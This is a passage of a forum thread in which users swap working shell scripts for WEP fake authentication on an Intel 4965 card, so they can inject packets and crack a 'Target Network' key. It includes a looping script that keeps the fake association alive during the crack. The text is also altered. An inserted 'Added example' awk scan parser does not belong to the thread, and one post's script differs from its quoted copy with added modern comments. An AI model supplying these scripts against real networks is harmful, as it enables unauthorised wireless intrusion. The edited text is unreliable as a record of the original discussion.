
Thread: 4965 agn

  1. #41
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Quote Originally Posted by the_shadow View Post
    first WEP cracked but without AP association
    let's wait for BT4 final to see if this problem is solved!!!

    Or you can do some research on your own and find one of the many solves already out there. Help yourself, don't wait for someone to do it for you....



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  2. #42
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    20

    I just tried some scripts but... it doesn't work!!!!!

  3. #43
    Junior Member Zermelo's Avatar
    Join Date
    Feb 2010
    Posts
    54

    Quote Originally Posted by White View Post
    Strange. Until now I was trying manually and it didn't work. With the script things are different, hell knows why. But it still doesn't work. I get:

    Trying to associate with 00:xx:yy:zz:tt:aa (SSID='XXX' freq=2438 MHz)
    CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys

    With my script, you do not enter the BSSID, you enter the ESSID, that is the NAME of the AP, NOT the series of 6 hex numbers.

    Probably why some of you are having problems.

  4. #44
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    21

    Your script works fine. I managed to inject once, and then later on the same one it didn't work.

    On my other router it freezes after a few hundred.
    A question, however:

    What would happen if you have 2 with the same ESSID?

  5. #45
    Junior Member Zermelo's Avatar
    Join Date
    Feb 2010
    Posts
    54

    Quote Originally Posted by Abbygail View Post
    What would happen if you have 2 with the same ESSID?

    If they are on different channels then simply lock onto the channel with the essid you wish to crack. If they have the same essid and the same channel, then you would have to modify the script to also check for this then ask for the bssid as well, but this is an unlikely circumstance.

    It's a simple script meant to take the work out of continuously modifying the wpa_supplicant config file every time you want to fakeauth, so I'm sure there is a lot that could be improved.
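
Added example, not part of the posts above: a check that shows which network names in a scan listing are announced by more than one BSSID, and whether the duplicates share a channel, which is the case where the ESSID alone no longer identifies one AP (also useful for spotting duplicate or unexpected APs at a site you manage). It assumes an airodump-ng-style CSV with BSSID, channel and ESSID in columns 1, 4 and 14; the sample listing is constructed.

```shell
#!/bin/sh
# Added example (not from the thread): list ESSIDs announced by more than one BSSID.
# Assumed input: AP section of an airodump-ng-style CSV, with BSSID in column 1,
# channel in column 4 and ESSID in column 14. ESSIDs containing commas are not handled.

essid_collisions() {
    awk -F',' '
        function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
        /^Station MAC/ { exit }              # client section starts here; END still runs
        NF < 14 || $1 ~ /^BSSID/ { next }    # skip blank lines and the column header
        {
            bssid = trim($1); ch = trim($4); essid = trim($14)
            if (essid == "") next            # hidden network, no name to compare
            if (!(essid in total)) order[++n] = essid
            total[essid]++
            if (++perchan[essid, ch] > 1) clash[essid] = 1
            sep = (list[essid] == "") ? "" : " "
            list[essid] = list[essid] sep "ch" ch ":" bssid
        }
        END {
            for (i = 1; i <= n; i++) {
                e = order[i]
                if (total[e] < 2) continue   # unique name: the ESSID alone is enough
                kind = (e in clash) ? "same-channel" : "different-channels"
                printf "%s\t%s\t%s\n", e, kind, list[e]
            }
        }
    '
}

# Constructed sample listing; the MAC addresses and network names are made up.
sample_scan() {
    cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2010-02-20 10:00:00, 2010-02-20 10:05:00, 6, 54, WEP, WEP, , -40, 100, 0, 0.  0.  0.  0, 7, homenet,
02:00:00:00:00:02, 2010-02-20 10:00:01, 2010-02-20 10:05:00, 6, 54, WEP, WEP, , -62, 80, 0, 0.  0.  0.  0, 7, homenet,
02:00:00:00:00:03, 2010-02-20 10:00:02, 2010-02-20 10:05:00, 1, 54, WEP, WEP, , -55, 90, 0, 0.  0.  0.  0, 6, office,
02:00:00:00:00:04, 2010-02-20 10:00:03, 2010-02-20 10:05:00, 11, 54, WEP, WEP, , -70, 60, 0, 0.  0.  0.  0, 6, office,
02:00:00:00:00:05, 2010-02-20 10:00:04, 2010-02-20 10:05:00, 3, 54, OPN, , , -48, 70, 0, 0.  0.  0.  0, 5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:aa, 2010-02-20 10:01:00, 2010-02-20 10:05:00, -50, 10, 02:00:00:00:00:01, homenet
EOF
}

sample_scan | essid_collisions
```

Each output line is tab-separated: the ESSID, whether the duplicates are on the same channel or on different channels, and the channel:BSSID pairs that announce it.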

  6. #46
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    11

    Quote Originally Posted by Zermelo View Post
    If they are on different channels then simply lock onto the channel with the essid you wish to crack. If they have the same essid and the same channel, then you would have to modify the script to also check for this then ask for the bssid as well, but this is an unlikely circumstance.

    It's a simple script meant to take the work out of continuously modifying the wpa_supplicant config file every time you want to fakeauth, so I'm sure there is a lot that could be improved.

    Sorry, but no, I do not put in the BSSID when the script asks, only the ESSID.
    Maybe it's something wrong with the AP but I do not have anything else to test on.

    My goal is to get to see how CUDA works.

  7. #47
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    21

    After several days of trying to get this to work on my 4965, I finally got fake auth and injection working at the same time.

    Finally tried a fresh copy of BT4 booting to a non-persist USB drive, BT4 out of the box.

    I used the shell script Zermelo posted but I modified wep_key0 from 1801b56668 to "fakeauth". Without the quotes it would not work for me. It would successfully connect, but IV never increased while injecting. Both ARP Request and Fragmentation have been successful.

    The only problem I've encountered is that it appears wpa_supplicant seems to lose the fake auth connection without notification. There are periods where my IV won't increase for a period of 60 sec. or more. It eventually corrects itself, or I manually kill the shell script and restart it and they start increasing again.

    Code:
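    #!/bin/sh
    # Remove any previous config; -f keeps rm quiet when the file is absent
    rm -f fake.conf
    # Stop anything else that manages the wireless interface
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear
    echo ""
    echo "Enter the SSID of the Target Network:"
    read -r SEL
    # printf expands \n in every shell (echo only does so in some); the SSID is passed as an argument
    printf 'network={\n ssid="%s"\n key_mgmt=NONE\n wep_key0="fakeauth"\n}\n' "$SEL" > fake.conf
    echo "Starting Fake Authentication with $SEL"
    wpa_supplicant -c fake.conf -i wlan0 -Dwext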

  8. #48
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    20

    Quote Originally Posted by ochlocracy View Post
    After several days of trying to get this to work on my 4965, I finally got fake auth and injection working at the same time.

    Finally tried a fresh copy of BT4 booting to a non-persist USB drive, BT4 out of the box.

    I used the shell script Zermelo posted but I modified wep_key0 from 1801b56668 to "fakeauth". Without the quotes it would not work for me. It would successfully connect, but IV never increased while injecting. Both ARP Request and Fragmentation have been successful.

    The only problem I've encountered is that it appears wpa_supplicant seems to lose the fake auth connection without notification. There are periods where my IV won't increase for a period of 60 sec. or more. It eventually corrects itself, or I manually kill the shell script and restart it and they start increasing again.

    Code:
    #!/bin/sh
    rm fake.conf
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear
    echo -e ""
    echo "Enter the SSID of the Target Network:"
    read SEL
    echo 'network={ \n ssid="'$SEL'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > fake.conf
    echo -E "Starting Fake Authentication with "$SEL
    wpa_supplicant -c fake.conf -i wlan0 -Dwext

    One question: at echo "Enter the SSID of the Target Network:" do I have to put the ESSID name? Without ""???

  9. #49
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    21

    Yes, when running the script, once it asks for the SSID, enter it exactly as it appears in airodump-ng, no quotes.

    If you're using the modified script I posted, copy it into a file called fakeit. Give it execute permissions and run.

    # ./fakeit

    will ask for the SSID

    enter it exactly and you should be good.

  10. #50
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    21

    I'm still having problems with wpa_supplicant losing the fake auth, forcing me to have to restart it.

    So I added onto the shell script that was posted to continue to loop the fake auth connection.

    If anyone else is having this problem, this will work around it. Run it, it will ask for the ESSID, the number of times to repeat, and the sec in between. Default times should be good enough for standard WEP crack.

    Code:
    #!/bin/sh
    # Stop anything else that manages the wireless interface
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear
    echo ""
    echo "Enter the ESSID of the Target Network: (use last)"
    read -r SEL
    # -n with quotes so an ESSID containing spaces does not break the test
    if [ -n "$SEL" ]
    then
    	echo ""
    	if [ -e fake.conf ]; then
    		echo "Deleting old fake.conf"
    		rm fake.conf
    	fi
    	# printf expands \n in every shell (echo only does so in some)
    	printf 'network={\n ssid="%s"\n key_mgmt=NONE\n wep_key0="fakeauth"\n}\n' "$SEL" > fake.conf
    	echo "Starting Fake Authentication with $SEL"
    else
    	# Empty answer: reuse the config written by a previous run
    	if ! [ -e fake.conf ]; then
    		echo "ERROR - No config found, Provide ESSID"
    		exit 1
    	fi
    	echo ""
    	echo "Starting Fake Authentication with Previous ESSID"
    fi

    echo ""
    echo "How many times do you want to fake it? (30):"
    read -r TIMES
    if [ "$TIMES" = "" ]; then TIMES=30; fi

    echo ""
    echo "How many seconds between restarts? (45):"
    read -r SEC
    if [ "$SEC" = "" ]; then SEC=45; fi

    i=1
    while [ "$i" -le "$TIMES" ]
    do
    	# -B sends wpa_supplicant to the background so the loop can continue
    	wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
    	echo ""
    	echo "Fake Auth Connection ($i of $TIMES) Success ...maybe check airodump-ng to be sure."
    	i=$((i + 1))
    	if [ "$i" -le "$TIMES" ]; then
    		echo "Reconnecting in $SEC seconds"
    		sleep "$SEC"
    		echo "Faking orgasam again... uh! ah! That's the spot!"
    	fi
    done
